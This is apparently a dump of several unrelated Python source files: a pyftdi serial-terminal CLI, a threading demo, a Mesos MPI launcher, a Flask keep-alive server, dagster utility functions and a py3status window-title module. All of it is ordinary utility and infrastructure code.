                               help='prefix LF with CR char, use twice to '
                                    'replace all LF with CR chars')
        argparser.add_argument('-l', '--loopback',
                               action='store_true',
                               help='loopback mode (send back all received '
                                    'chars)')
        argparser.add_argument('-s', '--silent', action='store_true',
                               help='silent mode')
        argparser.add_argument('-P', '--vidpid', action='append',
                               help='specify a custom VID:PID device ID, '
                                    'may be repeated')
        argparser.add_argument('-V', '--virtual', type=FileType('r'),
                               help='use a virtual device, specified as YaML')
        argparser.add_argument('-v', '--verbose', action='count',
                               help='increase verbosity')
        argparser.add_argument('-d', '--debug', action='store_true',
                               help='enable debug mode')
        args = argparser.parse_args()
        debug = args.debug

        if not args.device:
            argparser.error('Serial device not specified')

        # Map the -v count onto a logging level, clamped to [DEBUG, ERROR].
        loglevel = max(DEBUG, ERROR - (10 * (args.verbose or 0)))
        loglevel = min(ERROR, loglevel)
        if debug:
            formatter = Formatter('%(asctime)s.%(msecs)03d %(name)-20s '
                                  '%(message)s', '%H:%M:%S')
        else:
            formatter = Formatter('%(message)s')
        FtdiLogger.set_formatter(formatter)
        FtdiLogger.set_level(loglevel)
        FtdiLogger.log.addHandler(StreamHandler(stderr))

        if args.virtual:
            # Route USB access through PyFtdi's virtual test backend.
            from pyftdi.usbtools import UsbTools
            # Force PyUSB to use PyFtdi test framework for USB backends
            UsbTools.BACKENDS = ('pyftdi.tests.backend.usbvirt', )
            # Ensure the virtual backend can be found and is loaded
            backend = UsbTools.find_backend()
            loader = backend.create_loader()()
            loader.load(args.virtual)

        try:
            add_custom_devices(Ftdi, args.vidpid)
        except ValueError as exc:
            argparser.error(str(exc))

        miniterm = MiniTerm(device=args.device,
                            baudrate=to_bps(args.baudrate),
                            parity='N',
                            rtscts=args.hwflow,
                            debug=args.debug)
        miniterm.run(args.fullmode, args.loopback, args.silent, args.localecho,
                     args.crlf)

    except (IOError, ValueError) as exc:
        print('\nError: %s' % exc, file=stderr)
        if debug:
            print(format_exc(chain=False), file=stderr)
        sysexit(1)
    except KeyboardInterrupt:
        sysexit(2)
# Script entry point.
if __name__ == '__main__':
    main()
|
event.py | #!/usr/bin/env python
# -*- coding:UTF-8 -*-
import threading
import time

# Shared event used to release the worker threads.
event = threading.Event()


def func():
    """Wait for the shared event, then report that it was received."""
    # Waiting for the event: enters the blocked state until it is set.
    print('%s wait for event...' % threading.current_thread().name)
    event.wait()
    # Event received: back to the running state.
    print('%s recv event.' % threading.current_thread().name)


if __name__ == '__main__':
    t1 = threading.Thread(target=func)
    t2 = threading.Thread(target=func)
    t1.start()
    t2.start()

    time.sleep(2)
    # Send the event notification to the waiting threads.
    print('MainThread set event.')
    event.set()
|
mrun.py | #!/usr/bin/env python
import mesos.native
import mesos.interface
from mesos.interface import mesos_pb2
import os
import logging
import re
import sys
import time
import math
import threading
import socket
import time
import tempfile
from optparse import OptionParser
from subprocess import *
def printOutput(p):
    # Stream the child process's stdout through to our own stdout
    # (Python 2 print statement; trailing comma suppresses the newline).
    for line in p.stdout:
        print line,
def startMPIExec(procs, slaves, program):
    """Launch mpiexec.hydra in manual-launcher mode from work_dir.

    Collects one proxy launch line per line of mpiexec stdout up to the
    HYDRA_LAUNCH_END sentinel and returns them; the remaining MPI output
    is echoed from a background thread.
    """
    os.symlink(os.getcwd() + '/export', work_dir + "/export")
    os.chdir(work_dir)
    hosts = ",".join(slaves)
    cmd = ["./export/bin/mpiexec.hydra", "-genv", "LD_LIBRARY_PATH", work_dir + "/libs", "-launcher", "manual", "-n", str(procs), "-hosts", str(hosts)]
    cmd.extend(program)
    p = Popen(cmd, stdout=PIPE)

    proxy_args = []
    while True:
        line = p.stdout.readline()
        if line == 'HYDRA_LAUNCH_END\n':
            break
        proxy_args.append(line)

    # Print rest MPI output.
    t = threading.Thread(target=printOutput, args=([p]))
    t.start()

    return proxy_args
def finalizeSlaves(callbacks):
    """Start mpiexec and deliver each proxy's launch command to its slave.

    ``callbacks`` is a list of [host, port] pairs recorded when the proxy
    tasks were scheduled (see HydraScheduler.resourceOffers).
    """
    time.sleep(1)
    logging.info("Finalize slaves")

    hosts = []
    for slave in callbacks:
        hosts.append(slave[0])
    proxy_args = startMPIExec(total_procs, hosts, mpi_program)
    proxy_id = 0

    for slave in callbacks:
        chost = slave[0]
        cport = int(slave[1])

        proxy_arg = proxy_args[proxy_id]
        proxy_id += 1

        # Hand the shared work dir and this proxy's launch line to the
        # hydra proxy listening on the slave's callback port.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((chost, cport))
        request = work_dir + ";" + proxy_arg
        s.send(request)
        s.close()
        # TODO(nnielsen): Add retry logic; slave might not be listening yet.

    logging.info("Done finalizing slaves")
class HydraScheduler(mesos.interface.Scheduler):
    """Mesos scheduler that launches one hydra proxy task per node, then
    triggers the MPI launch once all proxies report TASK_RUNNING."""

    def __init__(self, options):
        self.proxiesLaunched = 0
        self.proxiesRunning = 0
        self.proxiesFinished = 0
        self.options = options
        self.startedExec = False
        self.slaves = set()
        self.callbacks = []          # [host, port] pairs for proxy callbacks
        self.finalizeTriggered = False

    def registered(self, driver, fid, masterInfo):
        logging.info("Registered with framework ID %s" % fid.value)

    def resourceOffers(self, driver, offers):
        """Accept resource offers until one proxy per node is launched."""
        for offer in offers:
            if self.proxiesLaunched == total_nodes:
                driver.declineOffer(offer.id)
                continue

            cpus = 0
            mem = 0
            tasks = []

            if offer.hostname in self.slaves:
                logging.info("Declining offer: offer from slave already scheduled")
                # NOTE(review): despite the log message, this neither calls
                # driver.declineOffer nor skips the offer -- verify intent.

            for resource in offer.resources:
                if resource.name == "cpus":
                    cpus = resource.scalar.value
                elif resource.name == "mem":
                    mem = resource.scalar.value
                elif resource.name == "ports":
                    # Take the first offered port for the proxy callback.
                    # NOTE(review): `port` stays unset when an offer carries
                    # no ports resource -- presumably offers always include one.
                    port = resource.ranges.range[0].begin

            if cpus < cores_per_node or mem < mem_per_node:
                logging.info("Declining offer due to too few resources")
                driver.declineOffer(offer.id)
            else:
                tid = self.proxiesLaunched
                self.proxiesLaunched += 1

                logging.info("Launching proxy on offer %s from %s" % (offer.id, offer.hostname))

                task = mesos_pb2.TaskInfo()
                task.task_id.value = str(tid)
                task.slave_id.value = offer.slave_id.value
                task.name = "task %d " % tid

                cpus = task.resources.add()
                cpus.name = "cpus"
                cpus.type = mesos_pb2.Value.SCALAR
                cpus.scalar.value = cores_per_node

                mem = task.resources.add()
                mem.name = "mem"
                mem.type = mesos_pb2.Value.SCALAR
                mem.scalar.value = mem_per_node

                ports = task.resources.add()
                ports.name = "ports"
                ports.type = mesos_pb2.Value.RANGES
                r = ports.ranges.range.add()
                r.begin = port
                r.end = port

                lib = task.command.environment.variables.add()
                lib.name = "LD_LIBRARY_PATH"
                lib.value = work_dir + "/libs"

                hydra_uri = task.command.uris.add()
                hydra_uri.value = "file://" + nfs_path + "/hydra/hydra.tgz"

                executable_uri = task.command.uris.add()
                executable_uri.value = "file://" + nfs_path + "/hydra/" + mpi_program[0]

                task.command.value = "python hydra-proxy.py %d" % port

                tasks.append(task)
                logging.info("Replying to offer: launching proxy %d on host %s" % (tid, offer.hostname))
                logging.info("Call-back at %s:%d" % (offer.hostname, port))
                self.callbacks.append([offer.hostname, port])
                self.slaves.add(offer.hostname)
                driver.launchTasks(offer.id, tasks)

    def statusUpdate(self, driver, update):
        """Track proxy lifecycle; kick off the MPI launch once all run."""
        if (update.state == mesos_pb2.TASK_FAILED or
                update.state == mesos_pb2.TASK_KILLED or
                update.state == mesos_pb2.TASK_LOST):
            logging.error("A task finished unexpectedly: " + update.message)
            driver.stop()

        if (update.state == mesos_pb2.TASK_RUNNING):
            self.proxiesRunning += 1

            # Trigger real launch when threshold is met.
            if self.proxiesRunning >= total_nodes and not self.finalizeTriggered:
                self.finalizeTriggered = True
                threading.Thread(target = finalizeSlaves, args = ([self.callbacks])).start()

        if (update.state == mesos_pb2.TASK_FINISHED):
            self.proxiesFinished += 1
            if self.proxiesFinished == total_nodes:
                logging.info("All processes done, exiting")
                driver.stop()

    def offerRescinded(self, driver, offer_id):
        logging.info("Offer %s rescinded" % offer_id)
if __name__ == "__main__":
    # Parse command-line options; everything after the first two positional
    # args (mesos_master, mpi_program) is passed through to the MPI program.
    parser = OptionParser(usage="Usage: %prog [options] mesos_master mpi_program")
    parser.disable_interspersed_args()
    parser.add_option("-N", "--nodes",
                      help="number of nodes to run processes (default 1)",
                      dest="nodes", type="int", default=1)
    parser.add_option("-n", "--num",
                      help="total number of MPI processes (default 1)",
                      dest="procs", type="int", default=1)
    parser.add_option("-c", "--cpus-per-task",
                      help="number of cores per MPI process (default 1)",
                      dest="cores", type="int", default=1)
    parser.add_option("-m","--mem",
                      help="number of MB of memory per MPI process (default 1GB)",
                      dest="mem", type="int", default=1024)
    parser.add_option("--proxy",
                      help="url to proxy binary", dest="proxy", type="string")
    parser.add_option("--name",
                      help="framework name", dest="name", type="string")
    parser.add_option("--nfs",
                      help="NFS path", dest="nfs_path", type="string")
    parser.add_option("-p","--path",
                      help="path to look for MPICH2 binaries (mpiexec)",
                      dest="path", type="string", default="")
    parser.add_option("-v", action="store_true", dest="verbose")

    # Add options to configure cpus and mem.
    (options,args) = parser.parse_args()
    if len(args) < 2:
        print >> sys.stderr, "At least two parameters required."
        print >> sys.stderr, "Use --help to show usage."
        exit(2)

    if options.verbose == True:
        logging.basicConfig(level=logging.INFO)

    total_procs = options.procs
    total_nodes = options.nodes
    cores = options.cores
    # NOTE(review): under Python 2, `total_procs / total_nodes` is integer
    # (floor) division, so ceil() is a no-op here -- verify intended rounding.
    procs_per_node = math.ceil(total_procs / total_nodes)
    cores_per_node = procs_per_node * cores
    mem_per_node = options.mem
    mpi_program = args[1:]

    nfs_path = options.nfs_path
    if nfs_path == None:
        nfs_path = os.environ.get("NFS_PATH")
    if nfs_path == None:
        print >> sys.stderr, "NFS path required."
        exit(2)

    logging.info("Connecting to Mesos master %s" % args[0])
    logging.info("Total processes %d" % total_procs)
    logging.info("Total nodes %d" % total_nodes)
    logging.info("Procs per node %d" % procs_per_node)
    logging.info("Cores per node %d" % cores_per_node)

    scheduler = HydraScheduler(options)

    framework = mesos_pb2.FrameworkInfo()
    framework.user = ""

    if options.name is not None:
        framework.name = options.name
    else:
        framework.name = "MPICH2 Hydra : %s" % mpi_program[0]

    # Scratch directory shared via module global with the scheduler helpers.
    work_dir = tempfile.mkdtemp()

    driver = mesos.native.MesosSchedulerDriver(
        scheduler,
        framework,
        args[0])

    sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
|
keep_alive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
    """Health-check endpoint confirming the web server is up."""
    return "Hello. I am alive!"
def run():
    # Bind on all interfaces so external uptime monitors can reach us.
    app.run(host='0.0.0.0',port=8000)
def keep_alive():
    """Start the web server on a background thread without blocking."""
    Thread(target=run).start()
__init__.py | import contextlib
import datetime
import errno
import functools
import inspect
import os
import pickle
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from dagster import check, seven
from dagster.core.errors import DagsterExecutionInterruptedError, DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, TemporaryDirectory, multiprocessing, thread
from dagster.seven.abc import Mapping
from six.moves import configparser
from .merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
PICKLE_PROTOCOL = 4
DEFAULT_REPOSITORY_YAML_FILENAME = "repository.yaml"
DEFAULT_WORKSPACE_YAML_FILENAME = "workspace.yaml"
def file_relative_path(dunderfile, relative_path):
    """
    Resolve *relative_path* against the directory containing *dunderfile*.

    Useful when one needs to load a file that lives relative to the current
    source file — e.g. a configuration file path encoded in the source —
    regardless of the process's working directory:

        file_relative_path(__file__, 'path/relative/to/file')
    """
    check.str_param(dunderfile, "dunderfile")
    check.str_param(relative_path, "relative_path")
    base_dir = os.path.dirname(dunderfile)
    return os.path.join(base_dir, relative_path)
def script_relative_path(file_path):
    """
    Useful for testing with local files. Use a path relative to where the
    test resides and this function will return the absolute path
    of that file. Otherwise it will be relative to the script that
    ran the test.

    Note: this function is very, very expensive (on the order of 1
    millisecond per invocation) so this should only be used in performance
    insensitive contexts. Prefer file_relative_path for anything with
    performance constraints.
    """
    # from http://bit.ly/2snyC6s
    check.str_param(file_path, "file_path")
    # inspect.stack()[1][1] is the filename of the calling frame.
    scriptdir = inspect.stack()[1][1]
    return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
    """Convert a dash/underscore/dot/space separated string to CamelCase."""
    check.str_param(string, "string")
    # Drop a single leading separator, if any.
    stripped = re.sub(r"^[\-_\.]", "", str(string))
    if not stripped:
        return stripped
    # Uppercase the first character and every character following a separator.
    tail = re.sub(
        r"[\-_\.\s]([a-z])", lambda matched: str(matched.group(1)).upper(), stripped[1:]
    )
    return str(stripped[0]).upper() + tail
def ensure_single_item(ddict):
    """Validate that ``ddict`` contains exactly one entry and return it as (key, value)."""
    check.dict_param(ddict, "ddict")
    check.param_invariant(len(ddict) == 1, "ddict", "Expected dict with single item")
    return next(iter(ddict.items()))
@contextlib.contextmanager
def pushd(path):
    """Temporarily chdir into ``path``; always restore the previous cwd on exit."""
    previous_cwd = os.getcwd()
    os.chdir(path)
    try:
        yield path
    finally:
        # Restore even if the body raised.
        os.chdir(previous_cwd)
def safe_isfile(path):
""""Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
"""
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
    """Create ``path`` (including parents) if needed, like ``mkdir -p``.

    Returns ``path`` in all success cases — previously the function returned
    None when the directory already existed, making the return value
    inconsistent. Re-raises any OSError other than "already exists as a
    directory" (e.g. permission errors, or an existing file at ``path``).
    """
    try:
        os.makedirs(path)
    except OSError as exc:  # Python >2.5
        # EEXIST for an existing *directory* is fine (idempotent behavior);
        # anything else is a real error.
        if not (exc.errno == errno.EEXIST and os.path.isdir(path)):
            raise
    return path
class frozendict(dict):
    """An immutable dict: every mutating operation raises RuntimeError."""

    def __readonly__(self, *args, **kwargs):
        raise RuntimeError("Cannot modify ReadOnlyDict")
    # https://docs.python.org/3/library/pickle.html#object.__reduce__
    #
    # For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
    #  in __reduce__ tuple).  Since we want to disable __setitem__ and still inherit dict, we
    # override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
    # passed to __setstate__, allowing us to restore the frozendict.
    def __reduce__(self):
        return (frozendict, (), dict(self))

    def __setstate__(self, state):
        # Restore via dict.__init__, which is still permitted (only the
        # mutator methods below are disabled).
        self.__init__(state)
    # Disable every mutating entry point on dict.
    __setitem__ = __readonly__
    __delitem__ = __readonly__
    pop = __readonly__
    popitem = __readonly__
    clear = __readonly__
    update = __readonly__
    setdefault = __readonly__
    # Remove the helper so it does not leak into the class namespace.
    del __readonly__
class frozenlist(list):
    """An immutable list: every mutating operation raises RuntimeError.

    Unlike list, instances are hashable (like tuples), so they can be used
    as dict keys or set members.
    """

    def __readonly__(self, *args, **kwargs):
        raise RuntimeError("Cannot modify ReadOnlyList")
    # https://docs.python.org/3/library/pickle.html#object.__reduce__
    #
    # Like frozendict, implement __reduce__ and __setstate__ to handle pickling.
    # Otherwise, __setstate__ will be called to restore the frozenlist, causing
    # a RuntimeError because frozenlist is not mutable.
    def __reduce__(self):
        return (frozenlist, (), list(self))

    def __setstate__(self, state):
        self.__init__(state)
    # Disable every mutating entry point on list.
    __setitem__ = __readonly__
    __delitem__ = __readonly__
    append = __readonly__
    clear = __readonly__
    extend = __readonly__
    insert = __readonly__
    pop = __readonly__
    remove = __readonly__
    reverse = __readonly__
    sort = __readonly__

    def __hash__(self):
        # Hash like the equivalent tuple; safe because contents never change.
        return hash(tuple(self))
def make_readonly_value(value):
    """Recursively convert lists/dicts into frozenlist/frozendict; other values pass through."""
    if isinstance(value, dict):
        return frozendict({k: make_readonly_value(v) for k, v in value.items()})
    if isinstance(value, list):
        return frozenlist([make_readonly_value(item) for item in value])
    return value
def get_prop_or_key(elem, key):
    """Fetch ``key`` from a mapping via .get(), or from any other object via getattr()."""
    if not isinstance(elem, Mapping):
        return getattr(elem, key)
    return elem.get(key)
def list_pull(alist, key):
    """Pluck ``key`` from every element of ``alist`` (mapping lookup or attribute access)."""
    return [get_prop_or_key(elem, key) for elem in alist]
def all_none(kwargs):
    """Return True when every value in ``kwargs`` is None (vacuously True when empty)."""
    return all(value is None for value in kwargs.values())
def check_script(path, return_code=0):
    """Run ``path`` with the current interpreter and verify its exit code.

    With the default ``return_code=0``, any nonzero exit propagates as
    ``subprocess.CalledProcessError``. With a nonzero ``return_code``, the
    script must exit with exactly that code: a different nonzero code
    re-raises, and a *successful* exit now also raises (previously that case
    passed silently, so an "expected to fail" script that succeeded was never
    caught).
    """
    try:
        subprocess.check_output([sys.executable, path])
    except subprocess.CalledProcessError as exc:
        if return_code != 0 and exc.returncode == return_code:
            return
        raise
    if return_code != 0:
        # Expected a failure but the script exited cleanly.
        raise subprocess.CalledProcessError(0, [sys.executable, path])
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
    """Invoke ``dagster pipeline execute`` as a subprocess against ``pipeline_fn_name``
    defined in the file at ``path``, inside an ephemeral test instance.

    ``env_file``, when given, is passed through as the ``-c`` run-config YAML.
    Raises subprocess.CalledProcessError (after printing it) on a nonzero exit.
    """
    from dagster.core.test_utils import instance_for_test

    with instance_for_test():
        cli_cmd = [
            sys.executable,
            "-m",
            "dagster",
            "pipeline",
            "execute",
            "-f",
            path,
            "-a",
            pipeline_fn_name,
        ]
        if env_file:
            cli_cmd.append("-c")
            cli_cmd.append(env_file)
        try:
            subprocess.check_output(cli_cmd)
        except subprocess.CalledProcessError as cpe:
            # Surface the captured output before re-raising for easier debugging.
            print(cpe)  # pylint: disable=print-call
            raise cpe
def safe_tempfile_path_unmanaged():
    """Return a fresh, currently-unused temporary file path as a POSIX-style string.

    This gets a valid temporary file path in the safest possible way, although there is
    still no guarantee that another process will not create a file at this path. The
    NamedTemporaryFile is deleted when it is closed, so only the name survives.

    This is preferable to passing around the name of an *open* NamedTemporaryFile,
    because such files cannot be opened a second time on Windows NT or later:
    https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
    https://github.com/dagster-io/dagster/issues/1582
    """
    tmp = tempfile.NamedTemporaryFile()
    try:
        candidate = tmp.name
    finally:
        tmp.close()
    return Path(candidate).as_posix()
@contextlib.contextmanager
def safe_tempfile_path():
    """Context manager yielding a fresh temp-file *path* (no file is created);
    any file the caller creates at that path is unlinked on exit."""
    try:
        path = safe_tempfile_path_unmanaged()
        yield path
    finally:
        # The caller may or may not have created a file there; only unlink if present.
        if os.path.exists(path):
            os.unlink(path)
def ensure_gen(thing_or_gen):
    """Return ``thing_or_gen`` unchanged if it is already a generator, otherwise a
    generator that yields it once."""
    if inspect.isgenerator(thing_or_gen):
        return thing_or_gen

    def _single_item_gen():
        yield thing_or_gen

    return _single_item_gen()
def ensure_dir(file_path):
    """Create directory ``file_path`` (and parents); a no-op if it already exists."""
    try:
        os.makedirs(file_path)
    except OSError as err:
        # Ignore "already exists"; surface everything else (permissions, etc.).
        if err.errno != errno.EEXIST:
            raise
def ensure_file(path):
    """Create an empty file at ``path`` (and any missing parent directories)
    if it does not already exist; existing files are left untouched."""
    ensure_dir(os.path.dirname(path))
    if not os.path.exists(path):
        touch_file(path)
def touch_file(path):
    """Unix-style ``touch``: create ``path`` (and parents) if needed and update
    its access/modification times to now."""
    ensure_dir(os.path.dirname(path))
    # Opening in append mode creates the file without truncating existing content.
    with open(path, "a"):
        os.utime(path, None)
def _kill_on_event(termination_event):
    # Blocks until the multiprocessing event fires, then interrupts this process.
    # Intended to run on a daemon thread (see start_termination_thread below).
    termination_event.wait()
    send_interrupt()
def send_interrupt():
    """Deliver a KeyboardInterrupt-equivalent to the current process, cross-platform."""
    if IS_WINDOWS:
        # This will raise a KeyboardInterrupt in python land - meaning this wont be able to
        # interrupt things like sleep()
        thread.interrupt_main()
    else:
        # If on unix send an os level signal to interrupt any situation we may be stuck in
        os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
#  * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
#  * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
    """Spawn a daemon thread that interrupts this process when ``termination_event`` is set."""
    # type-check against the concrete Event type multiprocessing actually constructs
    check.inst_param(termination_event, "termination_event", ttype=type(multiprocessing.Event()))
    int_thread = threading.Thread(
        target=_kill_on_event, args=(termination_event,), name="kill-on-event"
    )
    # Daemon: must not block interpreter shutdown if the event never fires.
    int_thread.daemon = True
    int_thread.start()
# Executes the next() function within an instance of the supplied context manager class
# (leaving the context before yielding each result)
def iterate_with_context(context, iterator):
    """Drive ``iterator``, entering a fresh ``context()`` around each next() call.

    The context is exited *before* each item is yielded, so only the advance of
    user code runs under the context (e.g. an interrupt-allowing scope).
    """
    while True:
        with context():
            try:
                item = next(iterator)
            except StopIteration:
                return
        yield item
def datetime_as_float(dt):
    """Seconds since the Unix epoch, as a float (``dt`` is assumed naive UTC, like EPOCH)."""
    check.inst_param(dt, "dt", datetime.datetime)
    delta = dt - EPOCH
    return float(delta.total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
    """A frozendict restricted to str -> str entries, hashable so tag sets can
    be used as dict keys / set members."""

    def __init__(self, *args, **kwargs):
        super(frozentags, self).__init__(*args, **kwargs)
        # Validate after construction: every key and value must be a str.
        check.dict_param(self, "self", key_type=str, value_type=str)

    def __hash__(self):
        # Sort items so the hash is independent of insertion order.
        return hash(tuple(sorted(self.items())))

    def updated_with(self, new_tags):
        """Return a new frozentags with ``new_tags`` merged over this one (new values win)."""
        check.dict_param(new_tags, "new_tags", key_type=str, value_type=str)
        updated = dict(self)
        for key, value in new_tags.items():
            updated[key] = value
        return frozentags(updated)
class EventGenerationManager:
    """ Utility class that wraps an event generator function, that also yields a single instance of
    a typed object.  All events yielded before the typed object are yielded through the method
    `generate_setup_events` and all events yielded after the typed object are yielded through the
    method `generate_teardown_events`.
    This is used to help replace the context managers used in pipeline initialization with
    generators so that we can begin emitting initialization events AND construct a pipeline context
    object, while managing explicit setup/teardown.
    This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
    get the typed object.
    """

    def __init__(self, generator, object_cls, require_object=True):
        self.generator = check.generator(generator)
        self.object_cls = check.type_param(object_cls, "object_cls")
        self.require_object = check.bool_param(require_object, "require_object")
        # Set once generate_setup_events encounters an instance of object_cls.
        self.object = None
        self.did_setup = False
        self.did_teardown = False

    def generate_setup_events(self):
        """Yield events until the typed object appears; the object itself is captured, not yielded."""
        self.did_setup = True
        try:
            while self.object is None:
                obj = next(self.generator)
                if isinstance(obj, self.object_cls):
                    self.object = obj
                else:
                    yield obj
        except StopIteration:
            # Generator exhausted without producing the typed object; fail if one was required.
            if self.require_object:
                check.inst_param(
                    self.object,
                    "self.object",
                    self.object_cls,
                    "generator never yielded object of type {}".format(self.object_cls.__name__),
                )

    def get_object(self):
        """Return the captured typed object; must be called after generate_setup_events."""
        if not self.did_setup:
            check.failed("Called `get_object` before `generate_setup_events`")
        return self.object

    def generate_teardown_events(self):
        """Yield the remaining events from the generator (everything after the typed object)."""
        self.did_teardown = True
        if self.object:
            yield from self.generator
def utc_datetime_from_timestamp(timestamp):
    """Convert a POSIX timestamp (seconds since epoch) to a timezone-aware UTC datetime.

    Uses the stdlib ``datetime.timezone.utc`` on Python 3.2+, falling back to
    ``pytz`` on older interpreters.
    """
    # Compare the version-info tuple directly: the previous check tested major
    # and minor independently (``major >= 3 and minor >= 2``), which wrongly
    # rejects any X.0 / X.1 release of Python 3+.
    if sys.version_info >= (3, 2):
        from datetime import timezone

        tz = timezone.utc
    else:
        import pytz

        tz = pytz.utc
    return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
    """True when ``value`` is an instance of an Enum subclass; None-safe."""
    if value is None:
        return False
    return issubclass(value.__class__, Enum)
def git_repository_root():
    """Absolute path of the enclosing git repository's root, as a str.

    Shells out to ``git rev-parse``; raises CalledProcessError outside a repo.
    """
    return six.ensure_str(subprocess.check_output(["git", "rev-parse", "--show-toplevel"]).strip())
def segfault():
    """Reliable cross-Python version segfault.
    https://bugs.python.org/issue1215#msg143236

    Deliberately crashes the interpreter (dereferences address 0 via ctypes);
    used in tests that exercise crash/exit handling.
    """
    import ctypes

    ctypes.string_at(0)
def find_free_port():
    """Bind an ephemeral socket and return the OS-assigned free port number.

    Note the inherent race: the port is released when the socket closes, so
    another process could claim it before the caller binds.
    """
    with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        # SO_REUSEADDR must be set *before* bind() to affect the bind; the
        # previous code set it afterwards, where it had no effect.
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(("", 0))
        return s.getsockname()[1]
@contextlib.contextmanager
def alter_sys_path(to_add, to_remove):
    """Temporarily remove ``to_remove`` entries from sys.path and prepend ``to_add``,
    restoring the original sys.path on exit."""
    snapshot = list(sys.path)
    for entry in to_remove:
        if entry in sys.path:
            sys.path.remove(entry)
    for entry in to_add:
        sys.path.insert(0, entry)
    try:
        yield
    finally:
        # Replace wholesale rather than undoing edits piecemeal.
        sys.path = snapshot
@contextlib.contextmanager
def restore_sys_modules():
    """On exit, evict any modules that were imported inside the managed block."""
    snapshot = dict(sys.modules)
    try:
        yield
    finally:
        # Only *new* entries are removed; preexisting modules are untouched
        # even if they were reloaded or replaced inside the block.
        for name in set(sys.modules) - set(snapshot):
            del sys.modules[name]
def process_is_alive(pid):
    """Best-effort check that a process with ``pid`` currently exists.

    On Windows this delegates to psutil; elsewhere it shells out to ``ps``,
    treating any nonzero exit status as "no such process".
    """
    if IS_WINDOWS:
        import psutil  # pylint: disable=import-error

        return psutil.pid_exists(pid=pid)
    else:
        try:
            subprocess.check_output(["ps", str(pid)])
        except subprocess.CalledProcessError:
            # ``ps`` exits nonzero when the pid does not exist. The previous
            # code asserted returncode == 1, which used ``assert`` for control
            # flow (silently stripped under ``python -O``) and assumed a
            # platform-specific exit code.
            return False
        return True
def compose(*args):
    """
    Compose python functions args such that compose(f, g)(x) is equivalent to f(g(x)).
    With no arguments, returns the identity function.
    """
    composed = lambda x: x
    # Fold left, matching functools.reduce with the identity as initializer:
    # after processing f then g, the result is x -> f(g(x)).
    for fn in args:
        composed = (lambda outer, inner: lambda x: outer(inner(x)))(composed, fn)
    return composed
def dict_without_keys(ddict, *keys):
    """Return a shallow copy of ``ddict`` omitting the given keys."""
    # Build the exclusion set once instead of once per dict entry.
    excluded = set(keys)
    return {key: value for key, value in ddict.items() if key not in excluded}
|
window.py | # -*- coding: utf-8 -*-
"""
Display window properties (i.e. title, class, instance).
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 0.5)
format: display format for this module (default "{title}")
hide_title: hide title on containers with window title (default False)
max_width: specify width to truncate title with ellipsis (default None)
Format placeholders:
{class} window class
{instance} window instance
{title} window title
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# show alternative instead of empty title
window_title {
format = '{title}|\u2665'
}
```
@author shadowprince (counter), Anon1234 (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
{'full_text': u'scary snake movie - mpv'}
ellipsis
{'full_text': u'GitHub - ultrabug/py3sta…'}
"""
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
    """Base for the two IPC backends (I3ipc, Msg); stores the module and runs
    the backend-specific setup()."""

    def __init__(self, parent):
        self.parent = parent
        self.setup(parent)

    def compatibility(self, window_properties):
        # specify width to truncate title with ellipsis
        if self.parent.max_width:
            title = window_properties["title"]
            if len(title or "") > self.parent.max_width:
                window_properties["title"] = title[: self.parent.max_width - 1] + u"…"
        return window_properties
class I3ipc(Ipc):
    """
    i3ipc - an improved python library to control i3wm and sway

    Event-driven backend: a daemon thread subscribes to window events and
    pushes updates, so the module never polls (cache_timeout is disabled).
    """

    def setup(self, parent):
        from threading import Thread

        self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
        self.window_properties = {}
        t = Thread(target=self.start)
        t.daemon = True
        t.start()

    def start(self):
        # Runs on the daemon thread; i3.main() blocks dispatching events.
        from i3ipc import Connection

        i3 = Connection()
        self.change_title(i3)
        for event in ["workspace::focus", "window::close"]:
            i3.on(event, self.clear_title)
        for event in ["window::title", "window::focus", "binding"]:
            i3.on(event, self.change_title)
        i3.main()

    def clear_title(self, i3, event=None):
        self.update(i3.get_tree().find_focused())

    def change_title(self, i3, event=None):
        # NOTE(review): find_focused() can presumably return None when no
        # window has focus — verify against i3ipc before relying on this path.
        focused = i3.get_tree().find_focused()
        # hide title on containers with window title
